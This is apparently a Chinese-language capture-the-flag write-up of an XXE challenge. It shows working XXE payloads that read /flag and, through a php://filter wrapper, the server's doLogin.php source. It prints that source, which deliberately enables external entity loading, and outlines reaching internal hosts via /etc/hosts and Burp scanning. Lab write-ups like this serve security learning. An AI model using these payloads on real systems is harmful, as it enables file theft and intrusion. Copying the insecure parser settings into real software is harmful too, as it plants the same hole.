提交抓包发现是xxe
先拿XXE漏洞poc读/flag
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>hack</password>
</user>
flag并不在这里,那读一下他的源码
发现file协议读没用,换php协议读
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user>
<username>&file;</username>
<password>hack</password>
</user>
成功读取
<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
$USERNAME = 'admin'; //è´¦å·
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密ç
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
emmmm,没看出啥,搜了一波资料,发现可以xxe可以打内网
尝试无果
读一下用户信息
读取历史命令发现失败
看了wp,emmmm,没有提示根本想不到好吗?????(可能是我太菜了)
确实是要打内网,
不过是直接读取/etc/host,查看存活主机
访问主机,发现没有,那就bp跑存活主机
发现一台主机,直接有flag